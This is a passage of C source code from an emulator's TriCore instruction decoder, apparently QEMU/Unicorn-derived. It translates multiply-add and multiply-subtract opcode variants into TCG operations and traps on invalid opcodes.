OPC2_32_RRR1_MADD_Q_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madd64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); break; case OPC2_32_RRR1_MADD_Q_32_L: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_madd32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MADD_Q_64_L: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_madd64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MADD_Q_32_U: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_madd32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MADD_Q_64_U: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_madd64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MADD_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16add32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MADD_Q_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16add64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MADD_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16add32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MADD_Q_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16add64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MADDS_Q_32: gen_madds32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 32); break; case OPC2_32_RRR1_MADDS_Q_64: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_madds64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n); break; case OPC2_32_RRR1_MADDS_Q_32_L: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_madds32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MADDS_Q_64_L: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2]); gen_madds64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MADDS_Q_32_U: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_madds32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], temp, n, 16); break; case OPC2_32_RRR1_MADDS_Q_64_U: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r2], 16); gen_madds64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], temp, n); break; case OPC2_32_RRR1_MADDS_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16adds32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MADDS_Q_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_m16adds64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MADDS_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16adds32_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MADDS_Q_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_m16adds64_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], temp, temp2, n); break; case OPC2_32_RRR1_MADDR_H_64_UL: CHECK_REG_PAIR(r3); gen_maddr64_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 2); break; case OPC2_32_RRR1_MADDRS_H_64_UL: CHECK_REG_PAIR(r3); gen_maddr64s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, 2); break; case OPC2_32_RRR1_MADDR_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_maddr_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MADDR_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_maddr_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MADDRS_Q_32_LL: tcg_gen_ext16s_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1]); tcg_gen_ext16s_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2]); gen_maddrs_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; case OPC2_32_RRR1_MADDRS_Q_32_UU: tcg_gen_sari_tl(tcg_ctx, temp, tcg_ctx->cpu_gpr_d[r1], 16); tcg_gen_sari_tl(tcg_ctx, temp2, tcg_ctx->cpu_gpr_d[r2], 16); gen_maddrs_q(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], temp, temp2, n); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } tcg_temp_free(tcg_ctx, temp); tcg_temp_free(tcg_ctx, temp2); } static void decode_rrr1_maddsu_h(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4, n; op2 = MASK_OP_RRR1_OP2(ctx->opcode); r1 = MASK_OP_RRR1_S1(ctx->opcode); r2 = MASK_OP_RRR1_S2(ctx->opcode); r3 = MASK_OP_RRR1_S3(ctx->opcode); r4 = MASK_OP_RRR1_D(ctx->opcode); n = MASK_OP_RRR1_N(ctx->opcode); switch (op2) { case OPC2_32_RRR1_MADDSU_H_32_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsu_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDSU_H_32_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsu_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDSU_H_32_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsu_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDSU_H_32_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsu_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDSUS_H_32_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsus_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDSUS_H_32_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsus_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDSUS_H_32_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsus_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDSUS_H_32_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsus_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDSUM_H_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsum_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDSUM_H_64_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsum_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDSUM_H_64_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsum_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDSUM_H_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsum_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDSUMS_H_64_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsums_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDSUMS_H_64_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsums_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDSUMS_H_64_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsums_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDSUMS_H_64_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_maddsums_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDSUR_H_16_LL: gen_maddsur32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDSUR_H_16_LU: gen_maddsur32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDSUR_H_16_UL: gen_maddsur32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDSUR_H_16_UU: gen_maddsur32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MADDSURS_H_16_LL: gen_maddsur32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MADDSURS_H_16_LU: gen_maddsur32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MADDSURS_H_16_UL: gen_maddsur32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MADDSURS_H_16_UU: gen_maddsur32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rrr1_msub(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4, n; op2 = MASK_OP_RRR1_OP2(ctx->opcode); r1 = MASK_OP_RRR1_S1(ctx->opcode); r2 = MASK_OP_RRR1_S2(ctx->opcode); r3 = MASK_OP_RRR1_S3(ctx->opcode); r4 = MASK_OP_RRR1_D(ctx->opcode); n = MASK_OP_RRR1_N(ctx->opcode); switch (op2) { case OPC2_32_RRR1_MSUB_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msub_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUB_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msub_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUB_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msub_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUB_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msub_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBS_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubs_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBS_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubs_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBS_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubs_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBS_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubs_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBM_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBM_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBM_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBM_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubm_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBMS_H_LL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBMS_H_LU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBMS_H_UL: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBMS_H_UU: CHECK_REG_PAIR(r4); CHECK_REG_PAIR(r3); gen_msubms_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r4+1], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r3+1], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBR_H_LL: gen_msubr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBR_H_LU: gen_msubr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBR_H_UL: gen_msubr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBR_H_UU: gen_msubr32_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; case OPC2_32_RRR1_MSUBRS_H_LL: gen_msubr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LL); break; case OPC2_32_RRR1_MSUBRS_H_LU: gen_msubr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_LU); break; case OPC2_32_RRR1_MSUBRS_H_UL: gen_msubr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UL); break; case OPC2_32_RRR1_MSUBRS_H_UU: gen_msubr32s_h(ctx, tcg_ctx->cpu_gpr_d[r4], tcg_ctx->cpu_gpr_d[r3], tcg_ctx->cpu_gpr_d[r1], tcg_ctx->cpu_gpr_d[r2], n, MODE_UU); break; default: generate_trap(ctx, TRAPC_INSN_ERR, TIN2_IOPC); } } static void decode_rrr1_msubq_h(DisasContext *ctx) { TCGContext *tcg_ctx = ctx->uc->tcg_ctx; uint32_t op2; uint32_t r1, r2, r3, r4, n; TCGv temp, temp2; op2 = MASK_OP_RRR1_OP2(ctx->opcode); r1 = MASK_OP_RRR1_S1(ctx->opcode); r2 = MASK_OP_RRR1_S2(ctx->opcode); r3 = MASK_OP_RRR1_S3(ctx->opcode); r4 = MASK_OP_RRR1_D(ctx->opcode); n = MASK_OP_RRR1_N(ctx->opcode); temp = tcg_const_i32(tcg_ctx, n); temp2 = tcg_temp_new(tcg_ctx); switch (op2) { case OPC2_32_RRR1_MSUB_Q_32: gen_msub32_q(ctx, tcg_ctx->cpu_gpr_d[r4], 